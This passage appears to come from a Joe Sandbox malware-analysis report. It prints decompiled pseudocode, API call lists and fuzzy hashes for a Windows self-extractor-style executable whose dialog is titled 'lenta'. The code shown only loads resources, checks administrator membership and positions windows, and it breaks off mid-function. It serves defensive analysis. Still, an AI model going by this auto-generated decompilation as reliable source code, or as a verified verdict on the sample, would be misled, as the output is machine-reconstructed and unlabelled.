                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2168512254-0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                                                                                                                			E0010468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                                				long _t4;
                                                                                                                                                                                                                                                				void* _t11;
                                                                                                                                                                                                                                                				CHAR* _t14;
                                                                                                                                                                                                                                                				void* _t15;
                                                                                                                                                                                                                                                				long _t16;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t14 = __ecx;
                                                                                                                                                                                                                                                				_t11 = __edx;
                                                                                                                                                                                                                                                				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                                                                				_t16 = _t4;
                                                                                                                                                                                                                                                				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                                                                					if(_t16 == 0) {
                                                                                                                                                                                                                                                						L5:
                                                                                                                                                                                                                                                						return 0;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                                                                					if(_t15 == 0) {
                                                                                                                                                                                                                                                						goto L5;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                                                                					FreeResource(_t15);
                                                                                                                                                                                                                                                					return _t16;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return _t4;
                                                                                                                                                                                                                                                			}









                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001046A0
                                                                                                                                                                                                                                                • SizeofResource.KERNEL32(00000000,00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046A9
                                                                                                                                                                                                                                                • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001046C3
                                                                                                                                                                                                                                                • LoadResource.KERNEL32(00000000,00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046CC
                                                                                                                                                                                                                                                • LockResource.KERNEL32(00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046D3
                                                                                                                                                                                                                                                • memcpy_s.MSVCRT ref: 001046E5
                                                                                                                                                                                                                                                • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001046EF
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                                                                • String ID: TITLE$lenta
                                                                                                                                                                                                                                                • API String ID: 3370778649-2035842925
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 57%
                                                                                                                                                                                                                                                			E001017EE(intOrPtr* __ecx) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				short _v12;
                                                                                                                                                                                                                                                				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                                				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                                				void* _v24;
                                                                                                                                                                                                                                                				intOrPtr* _v28;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t14;
                                                                                                                                                                                                                                                				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                                                                				long _t28;
                                                                                                                                                                                                                                                				void* _t35;
                                                                                                                                                                                                                                                				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                                				signed int _t38;
                                                                                                                                                                                                                                                				intOrPtr* _t39;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t14 =  *0x108004; // 0xb5a2e1bc
                                                                                                                                                                                                                                                				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                                                                				_v12 = 0x500;
                                                                                                                                                                                                                                                				_t37 = __ecx;
                                                                                                                                                                                                                                                				_v16.Value = 0;
                                                                                                                                                                                                                                                				_v28 = __ecx;
                                                                                                                                                                                                                                                				_t28 = 0;
                                                                                                                                                                                                                                                				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                                                                				if(_t36 != 0) {
                                                                                                                                                                                                                                                					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                                                                					_v20 = _t20;
                                                                                                                                                                                                                                                					if(_t20 != 0) {
                                                                                                                                                                                                                                                						 *_t37 = 0;
                                                                                                                                                                                                                                                						_t28 = 1;
                                                                                                                                                                                                                                                						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                                                                							_t37 = _t39;
                                                                                                                                                                                                                                                							 *0x10a288(0, _v24, _v28);
                                                                                                                                                                                                                                                							_v20();
                                                                                                                                                                                                                                                							if(_t39 != _t39) {
                                                                                                                                                                                                                                                								asm("int 0x29");
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							FreeSid(_v24);
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					FreeLibrary(_t36);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E00106CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                                                                			}




















                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,001018DD), ref: 0010181A
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0010182C
                                                                                                                                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(001018DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,001018DD), ref: 00101855
                                                                                                                                                                                                                                                • FreeSid.ADVAPI32(?,?,?,?,001018DD), ref: 00101883
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,001018DD), ref: 0010188A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                                                                • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                                                                • API String ID: 4204503880-1888249752
                                                                                                                                                                                                                                                • Opcode ID: 8d352828195a3166c1b85f796c6bb9f1cd8d7bceaf65962081a3d48de902e33d
                                                                                                                                                                                                                                                • Instruction ID: 28321ac8fb3e080bcf2f159a1247c7bc47a77e83b6eebe478e410a50e88fc2ac
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8d352828195a3166c1b85f796c6bb9f1cd8d7bceaf65962081a3d48de902e33d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 63118671E00309BFDB149FA4EC49ABEBB78EF44701F50416AFA85E3290DBB49D458B91
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00103450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                                				void* _t7;
                                                                                                                                                                                                                                                				void* _t11;
                                                                                                                                                                                                                                                				struct HWND__* _t12;
                                                                                                                                                                                                                                                				int _t22;
                                                                                                                                                                                                                                                				struct HWND__* _t24;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t7 = _a8 - 0x10;
                                                                                                                                                                                                                                                				if(_t7 == 0) {
                                                                                                                                                                                                                                                					EndDialog(_a4, 2);
                                                                                                                                                                                                                                                					L11:
                                                                                                                                                                                                                                                					return 1;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t11 = _t7 - 0x100;
                                                                                                                                                                                                                                                				if(_t11 == 0) {
                                                                                                                                                                                                                                                					_t12 = GetDesktopWindow();
                                                                                                                                                                                                                                                					_t24 = _a4;
                                                                                                                                                                                                                                                					E001043D0(_t24, _t12);
                                                                                                                                                                                                                                                					SetWindowTextA(_t24, "lenta");
                                                                                                                                                                                                                                                					SetDlgItemTextA(_t24, 0x838,  *0x109404);
                                                                                                                                                                                                                                                					SetForegroundWindow(_t24);
                                                                                                                                                                                                                                                					goto L11;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(_t11 == 1) {
                                                                                                                                                                                                                                                					_t22 = _a12;
                                                                                                                                                                                                                                                					if(_t22 < 6) {
                                                                                                                                                                                                                                                						goto L11;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					if(_t22 <= 7) {
                                                                                                                                                                                                                                                						L8:
                                                                                                                                                                                                                                                						EndDialog(_a4, _t22);
                                                                                                                                                                                                                                                						return 1;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					if(_t22 != 0x839) {
                                                                                                                                                                                                                                                						goto L11;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					 *0x1091dc = 1;
                                                                                                                                                                                                                                                					goto L8;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                                                                			}








                                                                                                                                                                                                                                                0x00103486
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103486
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • EndDialog.USER32(?,?), ref: 00103490
                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 0010349A
                                                                                                                                                                                                                                                • SetWindowTextA.USER32(?,lenta), ref: 001034B2
                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(?,00000838), ref: 001034C4
                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 001034CB
                                                                                                                                                                                                                                                • EndDialog.USER32(?,00000002), ref: 001034D8
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                                                                • String ID: lenta
                                                                                                                                                                                                                                                • API String ID: 852535152-2780258678
                                                                                                                                                                                                                                                • Opcode ID: a3633865a0c7b967401ad77a0ecee355fe2299dc680f3d17ab6dc61c873f6e83
                                                                                                                                                                                                                                                • Instruction ID: eafb7417ac6be31bad284a28bff1d83cd0554eb7aaeb080ca294f6a63f200aa1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a3633865a0c7b967401ad77a0ecee355fe2299dc680f3d17ab6dc61c873f6e83
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 63017131240214ABD71A6F65DC1C96D3A69EF49711F504010FAE6CE9E1CBF19F81DBD1
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 95%
                                                                                                                                                                                                                                                			E00102AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t16;
                                                                                                                                                                                                                                                				int _t21;
                                                                                                                                                                                                                                                				char _t32;
                                                                                                                                                                                                                                                				intOrPtr _t34;
                                                                                                                                                                                                                                                				char* _t38;
                                                                                                                                                                                                                                                				char _t42;
                                                                                                                                                                                                                                                				char* _t44;
                                                                                                                                                                                                                                                				CHAR* _t52;
                                                                                                                                                                                                                                                				intOrPtr* _t55;
                                                                                                                                                                                                                                                				CHAR* _t59;
                                                                                                                                                                                                                                                				void* _t62;
                                                                                                                                                                                                                                                				CHAR* _t64;
                                                                                                                                                                                                                                                				CHAR* _t65;
                                                                                                                                                                                                                                                				signed int _t66;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t60 = __edx;
                                                                                                                                                                                                                                                				_t16 =  *0x108004; // 0xb5a2e1bc
                                                                                                                                                                                                                                                				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                                                                				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                                                                				_t65 = _a4;
                                                                                                                                                                                                                                                				_t44 = __edx;
                                                                                                                                                                                                                                                				_t64 = __ecx;
                                                                                                                                                                                                                                                				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                                                                					GetModuleFileNameA( *0x109a3c,  &_v268, 0x104);
                                                                                                                                                                                                                                                					while(1) {
                                                                                                                                                                                                                                                						_t17 =  *_t64;
                                                                                                                                                                                                                                                						if(_t17 == 0) {
                                                                                                                                                                                                                                                							break;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                                                                						 *_t65 =  *_t64;
                                                                                                                                                                                                                                                						if(_t21 != 0) {
                                                                                                                                                                                                                                                							_t65[1] = _t64[1];
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						if( *_t64 != 0x23) {
                                                                                                                                                                                                                                                							L19:
                                                                                                                                                                                                                                                							_t65 = CharNextA(_t65);
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                                							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                                                                								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                                                                									if( *_t64 == 0x23) {
                                                                                                                                                                                                                                                										goto L19;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									E00101680(_t65, E001017C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                                									_t52 = _t65;
                                                                                                                                                                                                                                                									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                                                                									_t60 = _t14;
                                                                                                                                                                                                                                                									do {
                                                                                                                                                                                                                                                										_t32 =  *_t52;
                                                                                                                                                                                                                                                										_t52 =  &(_t52[1]);
                                                                                                                                                                                                                                                									} while (_t32 != 0);
                                                                                                                                                                                                                                                									goto L17;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								E001065E8( &_v268);
                                                                                                                                                                                                                                                								_t55 =  &_v268;
                                                                                                                                                                                                                                                								_t62 = _t55 + 1;
                                                                                                                                                                                                                                                								do {
                                                                                                                                                                                                                                                									_t34 =  *_t55;
                                                                                                                                                                                                                                                									_t55 = _t55 + 1;
                                                                                                                                                                                                                                                								} while (_t34 != 0);
                                                                                                                                                                                                                                                								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                                                                								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                                                                									 *_t38 = 0;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								E00101680(_t65, E001017C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                                								_t59 = _t65;
                                                                                                                                                                                                                                                								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                                                                								_t60 = _t12;
                                                                                                                                                                                                                                                								do {
                                                                                                                                                                                                                                                									_t42 =  *_t59;
                                                                                                                                                                                                                                                									_t59 =  &(_t59[1]);
                                                                                                                                                                                                                                                								} while (_t42 != 0);
                                                                                                                                                                                                                                                								L17:
                                                                                                                                                                                                                                                								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					 *_t65 = _t17;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E00106CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                                                                			}

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00102AE6
                                                                                                                                                                                                                                                • IsDBCSLeadByte.KERNEL32(00000000), ref: 00102AF2
                                                                                                                                                                                                                                                • CharNextA.USER32(?), ref: 00102B12
                                                                                                                                                                                                                                                • CharUpperA.USER32 ref: 00102B1E
                                                                                                                                                                                                                                                • CharPrevA.USER32(?,?), ref: 00102B55
                                                                                                                                                                                                                                                • CharNextA.USER32(?), ref: 00102BD4
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 571164536-0
                                                                                                                                                                                                                                                • Opcode ID: 104a6c99e2462ef8a2356e3aa16991d1154bcff37da9cfa50c046cd2848399d6
                                                                                                                                                                                                                                                • Instruction ID: 436a6440473f4eb562bf96b50bc8f80a9ed4f8cfef06f6642b0dab262bc46c3c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 104a6c99e2462ef8a2356e3aa16991d1154bcff37da9cfa50c046cd2848399d6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 964127346082459FDF259F348C58AFD7BA99F56310F1440DAE8C293682DFF58E86CBA1
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                                                                                                			E001043D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				struct tagRECT _v24;
                                                                                                                                                                                                                                                				struct tagRECT _v40;
                                                                                                                                                                                                                                                				struct HWND__* _v44;
                                                                                                                                                                                                                                                				intOrPtr _v48;
                                                                                                                                                                                                                                                				int _v52;
                                                                                                                                                                                                                                                				intOrPtr _v56;
                                                                                                                                                                                                                                                				int _v60;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t29;
                                                                                                                                                                                                                                                				void* _t53;
                                                                                                                                                                                                                                                				intOrPtr _t56;
                                                                                                                                                                                                                                                				int _t59;
                                                                                                                                                                                                                                                				struct HWND__* _t63;
                                                                                                                                                                                                                                                				struct HWND__* _t67;
                                                                                                                                                                                                                                                				struct HWND__* _t68;
                                                                                                                                                                                                                                                				struct HDC__* _t69;
                                                                                                                                                                                                                                                				int _t72;
                                                                                                                                                                                                                                                				signed int _t74;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t63 = __edx;
                                                                                                                                                                                                                                                				_t29 =  *0x108004; // 0xb5a2e1bc
                                                                                                                                                                                                                                                				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                                                                				_t68 = __edx;
                                                                                                                                                                                                                                                				_v44 = __ecx;
                                                                                                                                                                                                                                                				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                                                                				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                                                                				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                                                                				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                                                                				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                                                                				_t69 = GetDC(_v44);
                                                                                                                                                                                                                                                				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                                                                				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                                                                				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                                                                				_t56 = _v48;
                                                                                                                                                                                                                                                				asm("cdq");
                                                                                                                                                                                                                                                				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                                                                				_t67 = 0;
                                                                                                                                                                                                                                                				if(_t72 >= 0) {
                                                                                                                                                                                                                                                					_t63 = _v52;
                                                                                                                                                                                                                                                					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                                                                						_t72 = _t63 - _t56;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t72 = _t67;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				asm("cdq");
                                                                                                                                                                                                                                                				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                                                                				if(_t59 >= 0) {
                                                                                                                                                                                                                                                					_t63 = _v60;
                                                                                                                                                                                                                                                					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                                                                						_t59 = _t63 - _t53;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t59 = _t67;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E00106CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                                                                			}

























APIs
• GetWindowRect.USER32(?,?), ref: 001043F1
• GetWindowRect.USER32(00000000,?), ref: 0010440B
• GetDC.USER32(?), ref: 00104423
• GetDeviceCaps.GDI32(00000000,00000008), ref: 0010442E
• GetDeviceCaps.GDI32(00000000,0000000A), ref: 0010443A
• ReleaseDC.USER32(?,00000000), ref: 00104447
• SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001), ref: 001044A2
Memory Dump Source
• Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
• Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
Similarity
• API ID: Window$CapsDeviceRect$Release
• String ID:
• API String ID: 2212493051-0
• Opcode ID: 6ed3530bebf1205e2110b57e7edddbb26acb6841c45914a4b6e5ef4a4f285179
• Instruction ID: b8ad62693eb192f68b85d4c704a9183c2afb9b6c1156a442431fc3bd588b7fc0
• Opcode Fuzzy Hash: 6ed3530bebf1205e2110b57e7edddbb26acb6841c45914a4b6e5ef4a4f285179
• Instruction Fuzzy Hash: BC314D72E00219AFCB14CFB8DD889EEBBB5EF89310F554169F945F3280DAB06C458B60
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 53%
                                                                                                                                                                                                                                                			E00106298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v28;
                                                                                                                                                                                                                                                				intOrPtr _v32;
                                                                                                                                                                                                                                                				struct HINSTANCE__* _v36;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t16;
                                                                                                                                                                                                                                                				struct HRSRC__* _t21;
                                                                                                                                                                                                                                                				intOrPtr _t26;
                                                                                                                                                                                                                                                				void* _t30;
                                                                                                                                                                                                                                                				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                                				intOrPtr* _t40;
                                                                                                                                                                                                                                                				void* _t41;
                                                                                                                                                                                                                                                				intOrPtr* _t44;
                                                                                                                                                                                                                                                				intOrPtr* _t45;
                                                                                                                                                                                                                                                				void* _t47;
                                                                                                                                                                                                                                                				signed int _t50;
                                                                                                                                                                                                                                                				struct HINSTANCE__* _t51;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t44 = __edx;
                                                                                                                                                                                                                                                				_t16 =  *0x108004; // 0xb5a2e1bc
                                                                                                                                                                                                                                                				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                                                                				_t46 = 0;
                                                                                                                                                                                                                                                				_v32 = __ecx;
                                                                                                                                                                                                                                                				_v36 = 0;
                                                                                                                                                                                                                                                				_t36 = 1;
                                                                                                                                                                                                                                                				E0010171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                                					_t51 = _t51 + 0x10;
                                                                                                                                                                                                                                                					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                                                                					if(_t21 == 0) {
                                                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                                                                					if(_t45 == 0) {
                                                                                                                                                                                                                                                						 *0x109124 = 0x80070714;
                                                                                                                                                                                                                                                						_t36 = _t46;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                                                                						_t44 = _t5;
                                                                                                                                                                                                                                                						_t40 = _t44;
                                                                                                                                                                                                                                                						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                                                                						_t47 = _t6;
                                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                                							_t26 =  *_t40;
